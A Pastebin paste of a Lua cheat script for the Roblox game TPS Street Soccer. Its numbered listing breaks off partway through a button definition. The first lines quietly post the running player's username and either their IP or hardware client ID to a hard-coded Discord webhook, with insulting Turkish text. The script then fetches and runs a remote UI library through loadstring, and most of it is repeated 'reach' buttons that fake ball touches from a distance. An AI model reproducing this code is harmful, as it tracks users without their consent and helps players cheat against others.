Advertisement
eodejmocmocm

Untitled

Mar 7th, 2024
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 50.13 KB | None | 0 0
  1. Http = game:GetService("HttpService")
  2. Web = "https://discord.com/api/webhooks/1085048921191108728/HFCNv63o7uWvpnh00LOYNWsvkAVjTSIT87wZMftXnYAX0fnYvi5lAIKLXh_h2F3ouydz"
  3.  
  4. if syn then
  5. local responce = syn.request(
  6. {
  7. Url = Web,
  8. Method = 'POST',
  9. Headers = {
  10. ['Content-Type'] = 'application/json'
  11. },
  12. Body = Http:JSONEncode({
  13. ["content"] = "",
  14. ["embeds"] = {{
  15. ["title"] = "**scriptin çalıştırıldı!**",
  16. ["description"] = game.Players.LocalPlayer.Name.. " bu oç sc kullandı",
  17. ["type"] = "rich",
  18. ["color"] = tonumber(random),
  19. ["fields"] = {
  20. {
  21. ["name"] = " Ip",
  22. ["value"] = game:HttpGet("", true),
  23. ["inline"] = true
  24. }
  25. }
  26.  
  27. }}
  28. })
  29. })
  30. else
  31. request(
  32. {
  33. Url = Web,
  34. Method = 'POST',
  35. Headers = {
  36. ['Content-Type'] = 'application/json'
  37. },
  38. Body = Http:JSONEncode({
  39. ["content"] = "",
  40. ["embeds"] = {{
  41. ["title"] = "**Scriptini Çalıştırdı!**",
  42. ["description"] = game.Players.LocalPlayer.Name.. " hardwareid aşağıda",
  43. ["type"] = "rich",
  44. ["color"] = tonumber(random),
  45. ["fields"] = {
  46. {
  47. ["name"] = "Hardware ID:",
  48. ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
  49. ["inline"] = true
  50. }
  51. }
  52.  
  53. }}
  54. })
  55. })
  56. end
  57.  
  58.  
  59.  
  60. --script
  61. local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
  62. local Window = OrionLib:MakeWindow({Name = "Homelander Tps Script", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest", IntroEnabled = true, IntroText = "Homelander"})
  63.  
  64.  
  65. --reach
  66. local Tab = Window:MakeTab({
  67. Name = "reach settings",
  68. Icon = "rbxassetid://4483345998",
  69. PremiumOnly = false
  70. })
  71.  
  72. --bestreach
  73. Tab:AddButton({
  74. Name = "2 studs right foot",
  75. Callback = function()
  76. getgenv().Leg = "Right" -- Left or Right
  77. getgenv().Reach = 2 -- Change to whatever you want (The game caps it)
  78. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  79. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  80. game["RunService"].Stepped:Connect(function()
  81. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  82. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  83. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  84. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  85. end
  86. end
  87. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  88. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  89. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  90. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  91. end
  92. end
  93. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  94. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  95. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  96. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  97. end
  98. end
  99. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  100. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  101. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  102. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  103. end
  104. end
  105. end)
  106. end
  107. })
  108.  
  109. Tab:AddButton({
  110. Name = "3 studs right foot",
  111. Callback = function()
  112. getgenv().Leg = "Right" -- Left or Right
  113. getgenv().Reach = 3 -- Change to whatever you want (The game caps it)
  114. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  115. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  116. game["RunService"].Stepped:Connect(function()
  117. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  118. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  119. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  120. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  121. end
  122. end
  123. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  124. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  125. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  126. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  127. end
  128. end
  129. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  130. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  131. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  132. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  133. end
  134. end
  135. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  136. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  137. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  138. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  139. end
  140. end
  141. end)
  142. end
  143. })
  144.  
  145. Tab:AddButton({
  146. Name = "4 studs right foot",
  147. Callback = function()
  148. getgenv().Leg = "Right" -- Left or Right
  149. getgenv().Reach = 4 -- Change to whatever you want (The game caps it)
  150. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  151. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  152. game["RunService"].Stepped:Connect(function()
  153. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  154. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  155. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  156. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  157. end
  158. end
  159. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  160. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  161. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  162. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  163. end
  164. end
  165. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  166. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  167. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  168. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  169. end
  170. end
  171. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  172. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  173. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  174. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  175. end
  176. end
  177. end)
  178. end
  179. })
  180.  
  181. Tab:AddButton({
  182. Name = "5 studs right foot",
  183. Callback = function()
  184. getgenv().Leg = "Right" -- Left or Right
  185. getgenv().Reach = 5 -- Change to whatever you want (The game caps it)
  186. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  187. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  188. game["RunService"].Stepped:Connect(function()
  189. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  190. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  191. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  192. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  193. end
  194. end
  195. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  196. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  197. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  198. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  199. end
  200. end
  201. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  202. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  203. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  204. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  205. end
  206. end
  207. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  208. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  209. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  210. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  211. end
  212. end
  213. end)
  214. end
  215. })
  216.  
  217. Tab:AddButton({
  218. Name = "8 studs right foot",
  219. Callback = function()
  220. getgenv().Leg = "Right" -- Left or Right
  221. getgenv().Reach = 8 -- Change to whatever you want (The game caps it)
  222. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  223. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  224. game["RunService"].Stepped:Connect(function()
  225. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  226. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  227. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  228. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  229. end
  230. end
  231. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  232. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  233. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  234. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  235. end
  236. end
  237. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  238. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  239. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  240. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  241. end
  242. end
  243. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  244. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  245. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  246. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  247. end
  248. end
  249. end)
  250. end
  251. })
  252.  
  253. Tab:AddButton({
  254. Name = "15 studs right foot",
  255. Callback = function()
  256. getgenv().Leg = "Right" -- Left or Right
  257. getgenv().Reach = 15 -- Change to whatever you want (The game caps it)
  258. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  259. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  260. game["RunService"].Stepped:Connect(function()
  261. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  262. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  263. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  264. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  265. end
  266. end
  267. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  268. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  269. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  270. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  271. end
  272. end
  273. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  274. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  275. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  276. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  277. end
  278. end
  279. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  280. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  281. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  282. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  283. end
  284. end
  285. end)
  286. end
  287. })
  288.  
  289. Tab:AddButton({
  290. Name = "30 studs right foot",
  291. Callback = function()
  292. getgenv().Leg = "Right" -- Left or Right
  293. getgenv().Reach = 30 -- Change to whatever you want (The game caps it)
  294. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  295. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  296. game["RunService"].Stepped:Connect(function()
  297. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  298. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  299. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  300. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  301. end
  302. end
  303. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  304. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  305. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  306. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  307. end
  308. end
  309. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  310. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  311. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  312. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  313. end
  314. end
  315. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  316. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  317. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  318. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  319. end
  320. end
  321. end)
  322. end
  323. })
  324.  
  325. Tab:AddButton({
  326. Name = "2 studs left foot",
  327. Callback = function()
  328. getgenv().Leg = "Left" -- Left or Right
  329. getgenv().Reach = 2 -- Change to whatever you want (The game caps it)
  330. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  331. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  332. game["RunService"].Stepped:Connect(function()
  333. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  334. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  335. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  336. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  337. end
  338. end
  339. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  340. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  341. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  342. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  343. end
  344. end
  345. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  346. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  347. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  348. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  349. end
  350. end
  351. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  352. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  353. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  354. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  355. end
  356. end
  357. end)
  358. end
  359. })
  360.  
  361. Tab:AddButton({
  362. Name = "3 studs left foot",
  363. Callback = function()
  364. getgenv().Leg = "Left" -- Left or Right
  365. getgenv().Reach = 3 -- Change to whatever you want (The game caps it)
  366. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  367. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  368. game["RunService"].Stepped:Connect(function()
  369. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  370. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  371. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  372. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  373. end
  374. end
  375. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  376. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  377. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  378. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  379. end
  380. end
  381. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  382. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  383. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  384. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  385. end
  386. end
  387. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  388. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  389. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  390. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  391. end
  392. end
  393. end)
  394. end
  395. })
  396.  
  397. Tab:AddButton({
  398. Name = "4 studs left foot",
  399. Callback = function()
  400. getgenv().Leg = "Left" -- Left or Right
  401. getgenv().Reach = 4 -- Change to whatever you want (The game caps it)
  402. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  403. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  404. game["RunService"].Stepped:Connect(function()
  405. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  406. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  407. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  408. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  409. end
  410. end
  411. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  412. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  413. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  414. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  415. end
  416. end
  417. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  418. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  419. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  420. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  421. end
  422. end
